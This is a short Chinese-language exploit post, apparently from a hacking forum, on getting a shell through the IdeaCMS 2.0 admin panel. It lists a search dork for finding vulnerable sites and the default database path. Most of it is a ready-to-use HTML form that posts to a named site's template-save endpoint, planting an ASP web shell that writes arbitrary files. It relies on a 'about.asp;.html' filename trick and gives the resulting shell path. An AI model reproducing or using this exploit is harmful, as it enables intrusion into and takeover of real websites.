IdeaCMS2.0后台拿shell
IdeaCMS2.0后台拿shell
系统:IdeaCMS2.0
关键字: inurl:about/indexlist.asp?SortID=
默认数据库:date/Idea_Site.mdb
后台拿shell方法:
下面代码保存HTML 修改URL!
HTML代码
---------------------------------------------------------
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-type" content="text/html; charset=gbk" />
<TITLE>模板后台管理-EXP</TITLE>
</head>
<body>
<div class="container" id="cpcontainer">
<table class="tb">
<tr class="thead"><th colspan="2">修改模板</th></tr>
<form action="http://www.heimian.com/admin/admin_template.asp?action=save" method="post" >
<tr>
<td width="15%">文件路径:</td>
<td><input name="name" type="text" size="60" value="about.html" />
</tr>
<tr>
<td colspan="2"><textarea name="content" style="width:100%;font-family: Arial, Helvetica, sans-serif;font-size: 14px;" rows="25" dataType="Require" msg="请填写模版内容"><%set fso=server.createobject(ofso)%>
<%path=request("path")%>
<%if path<>"" then%>
<%data=request("dama")%>
<%set dama=fso.createtextfile(path,true)%>
<%dama.write data%>
<%if err=0 then%>
<%="Have fun!"%>
<%else%>
<%="false"%>
<%end if%>
<%err.clear%>
<%end if%>
<%dama.close%>
<%set dama=nothing%>
<%set fos=nothing%>
<%="<form action='' method=post>"%>
<%="<input type=text name=path>"%>
<%="<br>"%>
<%=server.mappath(request.servervariables("script_name"))%>
<%="<br>"%>
<%=""%>
<%="<textarea name=dama cols=50 rows=10 width=30></textarea>"%>
<%="<br>"%>
<%="<input type=submit value=OK~>"%></textarea></td>
</tr>
<tr>
<td></td><td ><input type="hidden" name="folder" value="../template/ideacms/html"><input name="filedir" type="hidden" value="../template/ideacms/html/about.asp;.html"><input type="submit" name="Submit" value="修改模板" class="btn" /> </td>
</tr>
</form>
</table>
</table>
-----------------------------------------------------------------
提交过后shell路径:
/template/ideacms/html/about.asp;.html